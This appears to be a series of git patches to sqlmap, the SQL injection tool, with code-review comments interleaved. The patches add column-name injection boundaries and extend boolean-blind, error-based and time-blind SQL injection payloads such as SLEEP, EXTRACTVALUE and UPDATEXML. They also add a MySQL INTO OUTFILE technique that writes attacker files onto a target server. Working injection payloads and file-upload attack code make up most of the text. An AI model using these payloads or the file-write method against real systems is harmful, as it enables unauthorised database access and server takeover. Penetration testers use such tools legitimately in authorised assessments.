-24ed497dd48a34fdada54a0cb62f1161 lib/core/settings.py
+c97ad42bb26a96c31617bd6e89de0761 lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 815d1cf27f0f8738d81531e73149867d lib/core/target.py
@@ -469,13 +469,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -55216973f6846ea2b3c3da39464dbf7e xml/boundaries.xml +b306c99a038b03421beea655dc804b64 xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml -b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml +fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml +0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml -c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml +a3c7d92a688a452952dcbe53ce86cf30 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml a5eecbca03800851635817e0ca832a92 xml/queries.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 8ecfe598006..52a6fd33beb 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -54,6 +54,7 @@ Tag: 3: LIKE single quoted string 4: Double quoted string 5: LIKE double quoted string + 6: Identifier (e.g. column name) Sub-tag: A string to prepend to the payload. @@ -491,20 +492,29 @@ Formats: 4 - 1 + 8 1 - 1 - ` - AND `[ORIGINAL] + 6 + `=`[ORIGINAL]` + AND `[ORIGINAL]`=`[ORIGINAL] 5 - 1 + 8 1 - 1 - "=[ORIGINAL] - AND [ORIGINAL]="[ORIGINAL] + 6 + "="[ORIGINAL]" + AND "[ORIGINAL]"="[ORIGINAL] + + + + 5 + 8 + 1 + 6 + ]=[[ORIGINAL]] + AND [[ORIGINAL]]=[[ORIGINAL] diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index ecf19cf8a19..00ba460f69b 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -160,7 +160,7 @@ Tag: 1 1 1 - 1,9 + 1,8,9 1 AND [INFERENCE] 
@@ -378,7 +378,7 @@ Tag: 1 3 1 - 1,2,3 + 1,2,3,8 1 AND MAKE_SET([INFERENCE],[RANDNUM]) @@ -416,7 +416,7 @@ Tag: 1 4 1 - 1,2,3 + 1,2,3,8 1 AND ELT([INFERENCE],[RANDNUM]) @@ -454,7 +454,7 @@ Tag: 1 5 1 - 1,2,3 + 1,2,3,8 1 AND ([INFERENCE])*[RANDNUM] @@ -492,7 +492,7 @@ Tag: 1 2 1 - 1 + 1,8 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL diff --git a/xml/payloads/error_based.xml b/xml/payloads/error_based.xml index 5cd78d8c107..410cada6941 100644 --- a/xml/payloads/error_based.xml +++ b/xml/payloads/error_based.xml @@ -7,7 +7,7 @@ 2 4 1 - 1,2,3,9 + 1,2,3,8,9 1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) @@ -32,7 +32,7 @@ 2 4 3 - 1,9 + 1,8,9 1 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) @@ -56,7 +56,7 @@ 2 4 1 - 1,2,3,9 + 1,2,3,8,9 1 AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) @@ -76,7 +76,7 @@ 2 4 3 - 1,9 + 1,8,9 1 OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) @@ -96,7 +96,7 @@ 2 5 1 - 1,2,3,9 + 1,2,3,8,9 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) @@ -117,7 +117,7 @@ 2 5 3 - 1,9 + 1,8,9 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) @@ -137,7 +137,7 @@ 2 1 1 - 1,2,3,9 + 1,2,3,8,9 1 AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) @@ -161,7 +161,7 @@ 2 1 3 - 1,2,3,9 + 1,2,3,8,9 1 OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) 
@@ -186,7 +186,7 @@ 2 2 1 - 1,2,3,9 + 1,2,3,8,9 1 AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) @@ -210,7 +210,7 @@ 2 2 3 - 1,2,3,9 + 1,2,3,8,9 1 OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) @@ -235,7 +235,7 @@ 2 3 1 - 1,2,3,9 + 1,2,3,8,9 1 AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) @@ -259,7 +259,7 @@ 2 3 3 - 1,2,3,9 + 1,2,3,8,9 1 OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) @@ -284,7 +284,7 @@ 2 2 1 - 1,2,3,9 + 1,2,3,8,9 1 AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) @@ -309,7 +309,7 @@ 2 2 3 - 1,9 + 1,8,9 1 OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) @@ -334,7 +334,7 @@ 2 3 3 - 1,9 + 1,8,9 2 OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) @@ -354,7 +354,7 @@ 2 1 1 - 1,9 + 1,8,9 1 AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -373,7 +373,7 @@ 2 1 3 - 1,9 + 1,8,9 2 OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -392,7 +392,7 @@ 2 1 1 - 1,9 + 1,8,9 1 AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -413,7 +413,7 @@ 2 2 3 - 1,9 + 1,8,9 2 OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -434,7 +434,7 @@ 2 2 1 - 1,9 + 1,8,9 1 AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) 
@@ -455,7 +455,7 @@ 2 3 3 - 1,9 + 1,8,9 2 OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -476,7 +476,7 @@ 2 2 1 - 1,9 + 1,8,9 1 AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') @@ -497,7 +497,7 @@ 2 3 3 - 1,9 + 1,8,9 2 OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml index f92112a7cf8..d7453947008 100644 --- a/xml/payloads/time_blind.xml +++ b/xml/payloads/time_blind.xml @@ -7,7 +7,7 @@ 5 1 1 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -89,7 +89,7 @@ 5 2 1 - 1,2,3,9 + 1,2,3,8,9 1 AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -171,7 +171,7 @@ 5 2 2 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -335,7 +335,7 @@ 5 3 1 - 1,2,3,9 + 1,2,3,8,9 1 AND ELT([INFERENCE],SLEEP([SLEEPTIME])) @@ -414,7 +414,7 @@ 5 1 1 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -496,7 +496,7 @@ 5 2 2 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -617,7 +617,7 @@ 5 2 2 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) From 349e9b9fa5491c60b90860a6bfcca51343634799 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Sep 2018 00:16:59 +0200 Subject: [PATCH 266/428] Minor commit related to the #120 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/payloads/time_blind.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index d3ce650b61c..ff1c03088fe 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.9.7"
+VERSION = "1.2.9.8"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 1ae853c3ba3..d5cbc953c33 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-c97ad42bb26a96c31617bd6e89de0761 lib/core/settings.py
+8e0191efaa0a5d6a64a8e4e0aa772164 lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 815d1cf27f0f8738d81531e73149867d lib/core/target.py
@@ -476,6 +476,6 @@ fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml
 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
-a3c7d92a688a452952dcbe53ce86cf30 xml/payloads/time_blind.xml
+92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml
 ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
 a5eecbca03800851635817e0ca832a92 xml/queries.xml
diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml
index d7453947008..6423a8050ab 100644
--- a/xml/payloads/time_blind.xml
+++ b/xml/payloads/time_blind.xml
@@ -937,7 +937,7 @@ 5 3 2 - 1,9 + 1,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) From c37014b8e860aaa26a5888a30a3f2d894787b28e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Sep 2018 00:59:29 +0200 Subject: [PATCH 267/428] Implementation for an Issue #647 --- lib/core/settings.py | 2 +- lib/takeover/web.py | 3 +-- plugins/dbms/mysql/filesystem.py | 32 ++++++++++++++++++++++++++++++++ plugins/generic/filesystem.py | 10 ++++++++-- procs/mysql/write_file_limit.sql | 2 +- txt/checksum.md5 | 8 ++++---- 6 files changed, 47 insertions(+), 10 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ff1c03088fe..6ad23840554 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.8" +VERSION = "1.2.9.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 91e6bd9a458..67e0fdcb1ef 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -146,8 +146,7 @@ def _webFileInject(self, fileContent, fileName, directory): query += "OR %d=%d " % (randInt, randInt) query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding)) - query = agent.prefixQuery(query) - query = agent.suffixQuery(query) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) payload = agent.payload(newValue=query) page = Request.queryPage(payload) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 1181d3a8664..15819ab67c1 100644 
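Review bot: Dropping `agent.suffixQuery(query)` makes `_webFileInject` depend on the `write_file_limit` snippet ending in a SQL comment, and that contract now lives only in a trailing `# Note:` here, in the identical line of the new linesTerminatedWriteFile in plugins/dbms/mysql/filesystem.py, and in procs/mysql/write_file_limit.sql (which the same commit changes to end in `-- -`). If the snippet is edited later both call sites break silently, and the user's `--suffix` is no longer applied on this path; a shared helper that builds this query in one place, or at least a sanity check on the snippet's trailing comment next to `getSQLSnippet(...)`, would make the assumption explicit. The long trailing comment also pushes the line well past the file's usual width and reads better on its own line above the call.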
--- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +from lib.core.agent import agent +from lib.core.common import getSQLSnippet from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import popValue @@ -16,11 +18,13 @@ from lib.core.data import logger from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapNoneDataException from lib.request import inject +from lib.request.connect import Connect as Request from lib.techniques.union.use import unionUse from plugins.generic.filesystem import Filesystem as GenericFilesystem 
@@ -112,6 +116,34 @@ def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): return self.askCheckWrittenFile(wFile, dFile, forceCheck) + def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False): + logger.debug("encoding file to its hexadecimal string value") + + fcEncodedList = self.fileEncode(wFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warn(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) + logger.debug(debugMsg) + + query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) + payload = agent.payload(newValue=query) + page = Request.queryPage(payload) + + warnMsg = "expect junk characters inside the " + warnMsg += "file as a leftover from original query" + singleTimeWarnMessage(warnMsg) + + return self.askCheckWrittenFile(wFile, dFile, forceCheck) + def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): debugMsg = "creating a support table to write the hexadecimal " debugMsg += "encoded file to" diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 59ca3284ef3..8ae9ecfca78 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py 
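Review bot: `page = Request.queryPage(payload)` binds a result that linesTerminatedWriteFile never reads; either drop the name (`Request.queryPage(payload)`) or use it to decide whether the request went through before asking the user to verify the file. `fcEncodedStr = fcEncodedList[0][2:]` silently assumes fileEncode returns a hex string with a two-character prefix — worth a comment such as `# strip the leading "0x"; the snippet prepends its own`, since any change in fileEncode would corrupt every file written here. The encode/warn/debug preamble mirrors the code in `_webFileInject` in lib/takeover/web.py earlier in this series, so a small private helper would remove the duplication, and the `prefixQuery`-only path shares that method's reliance on the snippet's trailing comment.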
@@ -284,17 +284,23 @@ def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): if conf.direct or isStackingAvailable(): if isStackingAvailable(): debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "stacked query SQL injection technique" + debugMsg += "stacked query technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "UNION query SQL injection technique" + debugMsg += "UNION query technique" logger.debug(debugMsg) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) + elif Backend.isDbms(DBMS.MYSQL): + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "LINES TERMINATED BY technique" + logger.debug(debugMsg) + + written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to write files to the underlying file " diff --git a/procs/mysql/write_file_limit.sql b/procs/mysql/write_file_limit.sql index 58fccab0a19..e879fbe4030 100644 --- a/procs/mysql/write_file_limit.sql +++ b/procs/mysql/write_file_limit.sql @@ -1 +1 @@ -LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- +LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- - diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d5cbc953c33..06a6c8ca575 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
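Review bot: The new `elif Backend.isDbms(DBMS.MYSQL):` branch is taken whenever the back-end is MySQL and neither stacked nor UNION is usable, so the `else` branch that reports "none of the SQL injection techniques detected can be used" becomes unreachable for MySQL. If the LINES TERMINATED BY technique has preconditions of its own — presumably the injection has to sit inside a SELECT for `INTO OUTFILE` to apply — they should be tested on this branch rather than surfaced as an opaque failure through askCheckWrittenFile. At minimum a comment stating that this is a best-effort fallback whose request outcome is not inspected would set expectations. writeFile starts outside the hunk.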
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e0191efaa0a5d6a64a8e4e0aa772164 lib/core/settings.py +c762da4ab30d1e245ca359df355ff7a7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -89,7 +89,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py -f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py +a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py @@ -172,7 +172,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py +2f97535b5cfb28eac0d51bf67a0304f7 plugins/dbms/mysql/filesystem.py 34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 
@@ -210,7 +210,7 @@ ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py +0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py From 2b56bdfaa6fc7a3bca4a636500d7ea7c67ff5039 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Sep 2018 13:59:07 +0200 Subject: [PATCH 268/428] Patch for MsSQL column name injection --- lib/core/settings.py | 3 ++- thirdparty/ansistrm/ansistrm.py | 14 ++++++++++++-- txt/checksum.md5 | 6 +++--- xml/boundaries.xml | 4 ++-- 4 files changed, 19 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6ad23840554..84e2fcf4941 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.9" +VERSION = "1.2.9.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -324,6 +324,7 @@ # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( + r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", r"(?P[^\n>]*SQL Syntax[^\n<]+)", diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 9c2ae6dbd03..24533f249d2 100644 
--- a/thirdparty/ansistrm/ansistrm.py
+++ b/thirdparty/ansistrm/ansistrm.py
@@ -182,8 +182,8 @@ def colorize(self, message, levelno):
                     message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1)
 
                 if level != "PAYLOAD":
-                    for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted
-                        string = match.group(1)
+                    if any(_ in message for _ in ("parsed DBMS error message",)):
+                        string = re.search(r": '(.+)'", message).group(1)
                         if not message.endswith(self.reset):
                             reset = self.reset
                         elif self.bold in message: # bold
@@ -191,6 +191,16 @@ def colorize(self, message, levelno):
                         else:
                             reset = self.reset
                         message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1)
+                    else:
+                        for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted
+                            string = match.group(1)
+                            if not message.endswith(self.reset):
+                                reset = self.reset
+                            elif self.bold in message: # bold
+                                reset = self.reset + self.bold
+                            else:
+                                reset = self.reset
+                            message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1)
                 else:
                     message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset))
 
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 06a6c8ca575..b91a5d368b5 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-c762da4ab30d1e245ca359df355ff7a7 lib/core/settings.py
+021d606c9405fd23d630108bf5c39853 lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 815d1cf27f0f8738d81531e73149867d lib/core/target.py
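Review bot: In the first hunk `string = re.search(r": '(.+)'", message).group(1)` raises AttributeError whenever a message contains "parsed DBMS error message" but no `: '…'` fragment, because `re.search` returns None; bind the match first, `match = re.search(r": '(.+)'", message)` / `if match:` / `string = match.group(1)`, or fall through to the generic branch when nothing matches. The greedy `(.+)` is presumably meant to swallow quotes inside the DBMS error text, which is worth a short comment since the sibling pattern `[^']+` deliberately stops at the first quote. `any(_ in message for _ in ("parsed DBMS error message",))` iterates a one-element tuple and reads simpler as `"parsed DBMS error message" in message`. The second hunk re-indents a verbatim copy of the original loop under `else:`, so the reset-selection logic now lives twice; a small helper that takes `message` and returns `reset` would keep both paths in sync. colorize's body continues outside both hunks.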
@@ -287,7 +287,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -1996d6afa985a526df02efa1bf121976 thirdparty/ansistrm/ansistrm.py +b422795c5e589decec725963e480ffba thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py @@ -469,7 +469,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -b306c99a038b03421beea655dc804b64 xml/boundaries.xml +de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 52a6fd33beb..8f2351412bb 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -513,8 +513,8 @@ Formats: 8 1 6 - ]=[[ORIGINAL]] - AND [[ORIGINAL]]=[[ORIGINAL] + ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM] + )|[[ORIGINAL] From 